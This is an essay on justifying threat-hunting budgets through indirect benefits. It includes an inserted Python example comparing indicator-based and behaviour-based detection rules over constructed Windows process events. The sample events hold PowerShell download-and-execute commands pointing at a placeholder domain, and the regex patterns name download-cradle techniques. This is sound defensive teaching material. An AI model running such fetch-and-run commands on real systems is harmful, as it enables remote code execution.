Cyber security can often seem Sisyphean. For those of you without a misspent youth, Sisyphus was a character from Greek myth who cheated death twice. The gods punished him by having him roll a heavy boulder up a hill, only for it to roll back down again, and the punishment was to last for eternity. He is likely still at it to this day, and I am sure threat hunting teams can sympathize, especially when it comes time for security budgeting.
Every year threat hunting teams face a similar battle when it comes time to justify their budget, and the fight is hardest for teams that are just getting started. The justification can be as difficult as Sisyphus’ labour, because hunt teams are tasked with discovering unknown threats, and success measured against the unknown is hard to show.
Unlike Sisyphus, hunt teams don’t have to face this fate for eternity. Instead, they should treat the budget conversation as an opportunity: they can present not only the traditional ROI models, but also the non-traditional ROI that threat hunting brings to the table. This lets them justify their budget and, at the same time, demonstrate the critical role that threat hunting plays.
What is Traditional ROI?
Before we can define non-traditional ROI, or return on investment, it is helpful to understand what traditional ROI is. Traditional ROI compares the revenue an effort generated against what that effort cost. In its simplest form the calculation is a ratio:
ROI = Revenue / Cost
If a marketing department runs ads with several providers, it can measure the revenue each campaign generated and divide that by what the ad placements cost. A ratio above 1 means the effort made money. (The textbook form, (Revenue - Cost) / Cost, expresses the same result as a gain relative to cost; it is positive exactly when the ratio above exceeds 1.) After all, businesses are in the business, so to speak, of making money.
Traditional ROI vs Cyber Security
Security teams face a particular challenge with this equation. They can certainly define the “cost” of their operation: the people, products, tools, and training they pay for every year. But, unlike other business departments, cyber security doesn’t produce revenue. That makes it hard for senior business leaders to justify the considerable share of the budget these teams consume.
Cyber security teams have come up with innovative answers to this problem. They can count the “attacks” an appliance blocked, or the number of incidents handled. That traditional approach doesn’t translate well to threat hunting, though, because a hunt’s best outcome is a threat nobody had a signature for. That is where non-traditional ROI comes into play.
Non-Traditional ROI for Threat Hunting
Non-traditional ROI posits that the “return” isn’t always monetary. Organizations must also count the ancillary benefits an effort produces. Marketing efforts build brand awareness; charity efforts build goodwill and reputation. These things can’t be easily quantified, but they are nonetheless important to companies. Threat hunting is the same.
Threat hunting should, of course, yield detections as well. But business leaders also need to weigh the broader benefits that threat hunting provides.
Non-Traditional ROI — Threat Detection Content.
The number one contribution hunting makes to non-traditional ROI is threat detection content. Despite security teams spending huge sums on “next generation” technology, much of it still relies on indicators of compromise (IOCs): file hashes, domains, and IP addresses. That reliance means these new tools, however technically advanced, end up producing the same results as the old ones, because an adversary can change an indicator far more cheaply than a defender can update the tool. Mature hunt teams are able to “short circuit” this problem with the outcomes of their hunts.
When hunt teams find something malicious that slipped through, they build detection content for it. That content shouldn’t rely on simple indicators, but on the behaviours the adversary exhibited: which process spawned which, what the command line looked like, how the tooling reached out to the network. Detection built on behaviours keeps firing when the hashes and domains change, so security teams are better able to detect unknown threats. This type of non-traditional ROI is invaluable.
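To make the indicator-versus-behaviour distinction concrete, here is an added example of my own (it is not code from the article) that runs two rules over a handful of constructed Windows process-creation events: an indicator rule keyed on a domain harvested from the first intrusion a hunt found, and a behaviour rule that fires when an Office application spawns a script host with an encoded command line or a download cradle. The hostnames, paths, domain and command lines are all made up for the illustration; the regular expressions are a starting point, not a tuned production rule.

```python
"""Indicator-based vs behaviour-based detection over constructed process-creation events.

Added illustration, not the article's code. Every event, path, domain and
command line below is constructed for the example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    event_id: int
    host: str
    parent_image: str
    image: str
    command_line: str


# --- Indicator rule: the one domain pulled from the intrusion the hunt first found ---
IOC_DOMAINS = {"cdn-update.example"}  # constructed placeholder, not a real indicator


def ioc_match(ev: ProcessEvent) -> bool:
    """Fires only when a known-bad domain appears verbatim in the command line."""
    cmd = ev.command_line.lower()
    return any(domain in cmd for domain in IOC_DOMAINS)


# --- Behaviour rule: an Office application spawning a script host that is handed
#     an encoded command or a download cradle. Nothing here is campaign-specific,
#     so the rule keeps firing after the attacker rotates infrastructure.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_COMMAND = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def behaviour_match(ev: ProcessEvent) -> bool:
    """Office parent + script-host child + (encoded command or download cradle)."""
    if basename(ev.parent_image) not in OFFICE_APPS:
        return False
    if basename(ev.image) not in SCRIPT_HOSTS:
        return False
    cmd = ev.command_line
    return bool(ENCODED_COMMAND.search(cmd) or DOWNLOAD_CRADLE.search(cmd))


def run_detections(events):
    """Return the event ids each rule fires on, so the two can be compared side by side."""
    return {
        "ioc_domain": [ev.event_id for ev in events if ioc_match(ev)],
        "office_spawns_script_host": [ev.event_id for ev in events if behaviour_match(ev)],
    }


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (one process-creation event per line).
SAMPLE_EVENTS = [
    # 1: the intrusion the hunt originally found; both rules fire
    ProcessEvent(1, "ws-0143", OFFICE + r"\WINWORD.EXE", PS,
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://cdn-update.example/a.ps1')\""),
    # 2: same tradecraft a month later: Excel lure, new domain hidden in an encoded
    #    command; only the behaviour rule fires
    ProcessEvent(2, "ws-0377", OFFICE + r"\EXCEL.EXE", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -nop -w hidden -ec "
                 "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # 3: the old domain reused from a scheduled task; the indicator still fires but the
    #    behaviour rule is out of scope because the parent is not an Office application
    ProcessEvent(3, "srv-0009", r"C:\Windows\System32\svchost.exe", PS,
                 "powershell.exe -c \"iwr http://cdn-update.example/b.ps1 -OutFile C:\\Windows\\Temp\\b.ps1\""),
    # 4: an administrator's backup script; neither rule fires
    ProcessEvent(4, "ws-0143", r"C:\Windows\explorer.exe", PS, "powershell.exe -File C:\\scripts\\backup.ps1"),
    # 5: Word printing; Office parent, but the child is not a script host
    ProcessEvent(5, "ws-0201", OFFICE + r"\WINWORD.EXE", r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    # 6: Office -> PowerShell with a plain command: not enough on its own for this rule
    ProcessEvent(6, "ws-0201", OFFICE + r"\WINWORD.EXE", PS, "powershell.exe -Command Get-Date"),
]

if __name__ == "__main__":
    for rule, ids in run_detections(SAMPLE_EVENTS).items():
        print(f"{rule}: {ids}")
```

The indicator rule catches event 1 and event 3; the behaviour rule catches event 1 and event 2. Event 2 is the point of the exercise: the same actor came back with a new domain and a new lure, and the indicator content was blind to it. Event 3 is the caveat: indicators still earn their keep for activity the behaviour rule deliberately scopes out, so the two layers complement rather than replace each other. Event 6 shows where tuning lives; widening the rule to any Office-to-PowerShell spawn would catch more, at the cost of the macros and add-ins the hunt team already knows are normal on those hosts.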
Non-Traditional ROI — Know Your Ground.
One of the more significant sources of non-traditional ROI that threat hunting provides is knowledge. Hunt teams have to become intimately familiar with their hunting grounds, which means hunters are often the people best equipped to answer questions like:
- What is this device?
- Is this activity normal?
- Is this application authorized?
- Is this behaviour expected for this user or host?
This kind of guidance saves security teams large amounts of time and effort, and that saving is itself a source of non-traditional ROI.
Non-Traditional ROI — Hardening the Defenses.
Cyber security folks are, by their very nature, curious, and none more so than threat hunters. In the course of their work, hunt teams inevitably end up in the darkest corners of a network, reading logs from devices the organization didn’t even know existed. It is a certainty that they will discover systems, devices, and controls that are misconfigured, or worse.
Hunting therefore lets organizations correct these mistakes proactively and, more importantly, before an adversary can exploit them. This proactive effort reduces the organization’s attack surface while confirming that existing defenses are configured properly.
Non-Traditional ROI — Playbook Builders & Force Multipliers.
Hunt teams are a key resource for internal process documentation around analysis. Well-seasoned hunt teams have “seen it all” and have likely “documented it all” in their hunt plans. Those written plans can serve as force multipliers: they are an integral source of truth that analysts can learn from and use as a reference, and savvy SOCs can use them to build out the often-missing analyst-focused playbooks.
This type of non-traditional ROI can yield large gains in the time it saves analysts.
Cyber security disciplines struggle to demonstrate a return on investment using traditional models, and none more so than threat hunting, since the practice is geared towards unknown threats. That barrier can seem insurmountable, especially when trying to justify an annual budget. But security teams should treat the challenge as an opportunity to highlight the non-traditional ROI that threat hunting delivers. Doing so can simplify future budget justifications… and put an end to rolling the rock up that hill.